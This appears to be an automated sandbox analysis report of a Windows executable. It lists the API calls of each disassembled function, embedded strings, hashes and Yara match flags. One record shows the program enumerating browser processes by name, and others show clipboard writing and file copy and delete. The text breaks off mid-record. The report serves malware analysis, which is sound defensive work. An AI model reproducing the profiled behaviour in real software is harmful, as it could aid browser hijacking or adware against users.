                                                                                                                                                                                                          • Instruction ID: c1765d83557327d14e69bb53c374c01942a1576d8409d5e2117e56dc28e46c4f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130793feb2d7a19d24d509355a51cfdb931754b3f4ebac2a6d812b8b63bcc8ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3286014231.000000000B630000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B630000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b630000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1c06715c5d2b1217f55ea1d5bd54248150642d40f625711e49e368b4ee8a96ea
                                                                                                                                                                                                          • Instruction ID: 247773a329db44f457dc8539cb9e3233ebbab0fa012ece22c5db105e98603722
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c06715c5d2b1217f55ea1d5bd54248150642d40f625711e49e368b4ee8a96ea
                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3286014231.000000000B630000.00000010.00000800.00020000.00000000.sdmp, Offset: 0B630000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b630000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bc9f7fcad917f804a4cb638df0614e6a56020e0bb46d1f55b358342282b53f78
                                                                                                                                                                                                          • Instruction ID: 924f2406c5575dd430c412869953e39048321f496b9924ae61f61d38cc9c7187
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc9f7fcad917f804a4cb638df0614e6a56020e0bb46d1f55b358342282b53f78
                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlInitializeCriticalSection.NTDLL(00597D08), ref: 0041BFCE
                                                                                                                                                                                                            • Part of subcall function 0041BF60: __Init_thread_footer.LIBCMT ref: 0041BFEA
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlEnterCriticalSection.NTDLL(00597D08), ref: 0041C005
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlLeaveCriticalSection.NTDLL(00597D08), ref: 0041C115
                                                                                                                                                                                                            • Part of subcall function 004717A0: std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                            • Part of subcall function 004717A0: Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,0000000F), ref: 00462B83
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00462B8B
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00462BFD
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00462C0A
                                                                                                                                                                                                            • Part of subcall function 00455FD0: RtlInitializeCriticalSection.NTDLL(00597E94), ref: 0045603E
                                                                                                                                                                                                            • Part of subcall function 00455FD0: __Init_thread_footer.LIBCMT ref: 0045605A
                                                                                                                                                                                                            • Part of subcall function 00455FD0: RtlEnterCriticalSection.NTDLL ref: 00456075
                                                                                                                                                                                                          • KillTimer.USER32(?,00000550,0000000F), ref: 00462C5D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterInit_thread_footerInitializeMessagePostQuitShowWindow$Affinity::operator!=Concurrency::details::HardwareKillLeaveTimerstd::locale::facet::facet
                                                                                                                                                                                                          • String ID: %ds$/qy/pp$P}A$TBY$appid$avlt$avs$btn_Close$click$close$countdown_text1$countdown_text2$down$install$item$js=$menu$pid$rnd$sid$tid$type$uid
                                                                                                                                                                                                          • API String ID: 3681526160-3787827338
                                                                                                                                                                                                          • Opcode ID: 0fb39c0d51a6938a7f6555bcb8cca7d40535ef37f5b2e9bbfd682352fc7445de
                                                                                                                                                                                                          • Instruction ID: ed17486b76200998b7f1adbb282c11307a059de2f7680e70323ee0329921b126
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fb39c0d51a6938a7f6555bcb8cca7d40535ef37f5b2e9bbfd682352fc7445de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B362D430911248EFDB24EF64CD45BEEBBB5BF50304F1084AEF049A7192DB786A44DB96
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlInitializeCriticalSection.NTDLL(00597D08), ref: 0041BFCE
                                                                                                                                                                                                            • Part of subcall function 0041BF60: __Init_thread_footer.LIBCMT ref: 0041BFEA
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlEnterCriticalSection.NTDLL(00597D08), ref: 0041C005
                                                                                                                                                                                                            • Part of subcall function 0041BF60: RtlLeaveCriticalSection.NTDLL(00597D08), ref: 0041C115
                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,EFE0703F,?,00000000), ref: 004365AC
                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?,?,00000000), ref: 00436658
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0043666A
                                                                                                                                                                                                            • Part of subcall function 0043BE40: GetCurrentProcessId.KERNEL32(00000000), ref: 0043BECD
                                                                                                                                                                                                            • Part of subcall function 0043BE40: PostMessageW.USER32(00000000,000007EA,-6A94B199), ref: 0043BEE1
                                                                                                                                                                                                            • Part of subcall function 00483970: GetProcAddress.KERNEL32 ref: 004839FF
                                                                                                                                                                                                            • Part of subcall function 00483970: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00483A15
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32FirstW.KERNEL32(00000000,?), ref: 00483A24
                                                                                                                                                                                                            • Part of subcall function 00483970: Process32NextW.KERNEL32(00000000,?), ref: 00483A4C
                                                                                                                                                                                                            • Part of subcall function 00483970: CloseHandle.KERNEL32(00000000), ref: 00483A53
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$CloseCreateHandleProcess32$AddressCurrentEnterEventFirstInit_thread_footerInitializeLeaveMessageMultipleNextObjectsPostProcProcessSnapshotToolhelp32Wait
                                                                                                                                                                                                          • String ID: 2345Explorer.exe$360chrome.exe$360se.exe$InsLnk.xml$Maxthon.exe$QQBrowser.exe$SLBrowser.exe$UCBrowser.exe$chrome.exe$firefox.exe$iexplore.exe$msedge.exe$sogouexplorer.exe
                                                                                                                                                                                                          • API String ID: 208262335-949901600
                                                                                                                                                                                                          • Opcode ID: 6c3f18b88190fae4ccd2eb9adb9a1bd77c4126660fac841e6ae9cf4e3b814cec
                                                                                                                                                                                                          • Instruction ID: 6458ee337c35b555381e9a9a956d28feeed5d9ff87ac979860b992d9eed53f7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c3f18b88190fae4ccd2eb9adb9a1bd77c4126660fac841e6ae9cf4e3b814cec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE2C270A002499BEF14DFA4C9497DEBBF0BF48318F20955DE044B72D1D779AA84CBA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0048E3D0: GetProcAddress.KERNEL32(?,?), ref: 0048E477
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,EFE0703F,00000000), ref: 0048E12B
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0048E163
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0048E16B
                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0048E186
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0048E18E
                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0048E1AE
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0048E1C4
                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0048E1E5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0048E201
                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00597A94,00000010,0048E01B,00000000), ref: 0048E221
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0048E23B
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Find$Close$CreateFirst$AddressCopyDeleteHandleProcReadSize
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3568010720-0
                                                                                                                                                                                                          • Opcode ID: 1bcc698940b050a87a3460eb661652275ec14e984550a024991a6b27c8852973
                                                                                                                                                                                                          • Instruction ID: 2254858a8e7ea8ba69ba115cdd798485c29968c93dc362b28c87a447cb02ec91
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bcc698940b050a87a3460eb661652275ec14e984550a024991a6b27c8852973
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0515B30A00208EBDF10DFA9DC89FEEB7B8AF15715F500529F512A21D0D778AA49CB94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002002,?), ref: 004AA134
                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004AA13D
                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004AA166
                                                                                                                                                                                                          • OpenClipboard.USER32(?), ref: 004AA175
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004AA17B
                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004AA184
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004AA18A
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1677084743-0
                                                                                                                                                                                                          • Opcode ID: 7e6d951e6f4ecf3f2143712e6c98a060afa0d87735fdf84fe4fa1db045409ecf
                                                                                                                                                                                                          • Instruction ID: 1647e85f9f82e15e28d7ff5b51ab08a8df37cd059c9dc8d6b448e44361d9f090
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e6d951e6f4ecf3f2143712e6c98a060afa0d87735fdf84fe4fa1db045409ecf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD118E7A200104EFC7049B6CEC4DDEAB7E9EF99319B01407AF905C3261DE716D55DBA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLastselect
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 215497628-0
                                                                                                                                                                                                          • Opcode ID: 0594a2ba5b3b075db490b6cc339492106e3470f784b45f8ef1857d275e62f01e
                                                                                                                                                                                                          • Instruction ID: cb12d01848e67e8695e53949726a8b445c0ef83839fa103a8f55cf472563cd01
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0594a2ba5b3b075db490b6cc339492106e3470f784b45f8ef1857d275e62f01e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C1A170A002598BCF25DF1AC8847EAB7B9EFA8351F1145EED859D3241DB349F808F58
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000003,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002,00000000,?,0052DBEB,00000003), ref: 0052E26F
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0052E224,00000003,0058C878,0000000C,0052E37B,00000003,00000002,00000000,?,0052DBEB,00000003), ref: 0052E276
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0052E288
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                          • Opcode ID: cfaea127e8a4d635fc17d4b6892199e49b5bb71ec14c1f5bab0d1a56e5d5a11f
                                                                                                                                                                                                          • Instruction ID: bb4af38821257ac5eb18e4c3d4b7169c6755c4d774b94cbfca06548bcaece3cf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfaea127e8a4d635fc17d4b6892199e49b5bb71ec14c1f5bab0d1a56e5d5a11f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E04639000218EBCF116F68ED0EAC93F29FF9A385F000420F9068A172CB35DD82DB90
                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00466275
• RegisterClassExW.USER32 ref: 00466290
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0046629A
• CreateWindowExW.USER32(00000000,ZCNMNBVCXZTP,00000000,86CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004662B7
• ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,00000030), ref: 004662DF
• GetModuleHandleW.KERNEL32(00000000,0000006B,?,?,?,?,?,?,?,00000030), ref: 00466306
• LoadIconW.USER32(00000000), ref: 00466309
• GetTempPathW.KERNEL32(00000104,?,?,?,?,00000030), ref: 00466333
Strings
Similarity
• API ID: HandleModule$Window$ClassCreateIconLoadPathRegisterShowTemp
• String ID: 0$ZCNMNBVCXZTP$tp%I64d.ico
• API String ID: 244549989-2830416069
• Opcode ID: 97698d29cbca3f3fe1d604c142f1b1d138738d512f44c8785b852b61c3c597a7
• Instruction ID: 044d5cf413f88435dded9a6980bf418663109767c9ab0a1025430e0beb0798e5
• Opcode Fuzzy Hash: 97698d29cbca3f3fe1d604c142f1b1d138738d512f44c8785b852b61c3c597a7
• Instruction Fuzzy Hash: E7A190B1644701BBE710DF64DC0AF97BBA8BB44714F00462AF618D72D0EBB4E418DBA6
APIs
• ___swprintf_l.LIBCMT ref: 004F057A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F05A3
• ___swprintf_l.LIBCMT ref: 004F05B5
• __allrem.LIBCMT ref: 004F05DA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F05E8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F05F8
• ___swprintf_l.LIBCMT ref: 004F060A
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0630
• ___swprintf_l.LIBCMT ref: 004F0642
• __allrem.LIBCMT ref: 004F0664
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0672
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0682
• ___swprintf_l.LIBCMT ref: 004F0694
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F06B9
• ___swprintf_l.LIBCMT ref: 004F06CB
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F06F0
• ___swprintf_l.LIBCMT ref: 004F0702
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F0719
• ___swprintf_l.LIBCMT ref: 004F072B
Strings
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$___swprintf_l$__allrem
                                                                                                                                                                                                          • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                                                                                                          • API String ID: 2797256748-2102732564
                                                                                                                                                                                                          • Opcode ID: c6d3d449d67c3002d3a794e9e66a2ed74b1253b5b53f65126e8a2ffe1f1697bc
                                                                                                                                                                                                          • Instruction ID: 5907b350e5f34a5239e610d513d85865ace62e288f1c0ef2e41ca8e5cfc663e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6d3d449d67c3002d3a794e9e66a2ed74b1253b5b53f65126e8a2ffe1f1697bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F4194B6B812A83AF92065496C06FBF161CEBD1F59F05042BFB04F718292996D2146FD
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000000), ref: 004AA313
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004AA32B
                                                                                                                                                                                                          • LocalReAlloc.KERNEL32(?,?,00000042,00000001,?), ref: 004AA3EB
                                                                                                                                                                                                          • LocalSize.KERNEL32(00000000), ref: 004AA3FC
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?), ref: 004AA434
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004AA43B
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 004AA48A
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 004AA4B9
                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 004AA53A
                                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?,?), ref: 004AA549
                                                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 004AA5A9
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 004AA5F9
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 004AA702
                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(00000000), ref: 004AA709
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 004AA7C5
                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 004AA7CC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$lstrlen$Process$AllocateBuffCharLocallstrcpy$AllocFreeLowerSizeUpper
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2363362608-0
                                                                                                                                                                                                          • Opcode ID: 0c9e0c2a2f9c2ea6b6de53bbe505b7f6adf009389cd9fcd2c9bd35fd9a6466e4
                                                                                                                                                                                                          • Instruction ID: b77b7fba4193eb915ddbb04b553bfc9438d7aefd2ad355a859e9a6762c1ccc13
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9e0c2a2f9c2ea6b6de53bbe505b7f6adf009389cd9fcd2c9bd35fd9a6466e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08F1C274B00606AFCB18DF78C544BAEB7B1FF55304F04462AE819A7390DB74AD64CB95
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00450383
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?,00000001), ref: 004503E1
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?,00000003), ref: 004505EF
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00450690
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,?,?,00000003), ref: 004506B8
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 004506D1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostQuitShowWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3232434430-0
                                                                                                                                                                                                          • Opcode ID: e1306742cea122a22e55211ffafa4b6e5c468b2b17600fbe6ff437d5d8fe3e75
                                                                                                                                                                                                          • Instruction ID: 88e679e9d980c86c5fc973ad448f642b26991a64aed8ca518197629f86466142
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1306742cea122a22e55211ffafa4b6e5c468b2b17600fbe6ff437d5d8fe3e75
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC10C74500609BBEB20DF20CC85BD9B774FF15304F10425AEA05A61D2EB75AADCCF99
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?), ref: 004500B1
                                                                                                                                                                                                            • Part of subcall function 00486C50: GetProcAddress.KERNEL32 ref: 00486D80
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00450168
                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 0045020E
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00450230
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00450237
                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00450247
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,00000003), ref: 0045028A
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00450297
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000,00000003), ref: 004502B8
                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004502C5
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ShowWindow$CountTick$AddressCloseCreateEventHandleLocalMessageObjectPostProcQuitSingleTimeWait
                                                                                                                                                                                                          • String ID: %I64d%d
                                                                                                                                                                                                          • API String ID: 676864848-2489624171
                                                                                                                                                                                                          • Opcode ID: 8a6503bf306ac5752a3bd76bb386aa833bd4ffe01a4f8f383f133f6f9918c645
                                                                                                                                                                                                          • Instruction ID: 30c08b5a3f4c3981425fc546ecf8c2decd1fede29d8afc949dfff43dea9be047
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6503bf306ac5752a3bd76bb386aa833bd4ffe01a4f8f383f133f6f9918c645
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98614734600605EBD728DF24DC4DBEBB7A4FF14306F04026AF91997292CB78A958CB95
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00460190
                                                                                                                                                                                                          • UpdateWindow.USER32(?), ref: 00460199
                                                                                                                                                                                                          • SetTimer.USER32(?,0000080D,000003E8,00000000), ref: 00460280
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004602F0
                                                                                                                                                                                                          • SetWindowPos.USER32(?,000000FF,?,?,?,?,00000201), ref: 00460314
                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0046031D
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00460328
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Show$ForegroundRectTimerUpdate
                                                                                                                                                                                                          • String ID: %ds$btn_Close$countdown_text1$countdown_text2
                                                                                                                                                                                                          • API String ID: 4221458010-784026027
                                                                                                                                                                                                          • Opcode ID: 1abd414938b5ce665989faa68cde5959edfef2d74d7e4ff1e3c71eb97e7710cc
                                                                                                                                                                                                          • Instruction ID: 3d372f7cc53981a324d6fc06ef82bcc375389a8d1f37053bac6b4e6cc6f61986
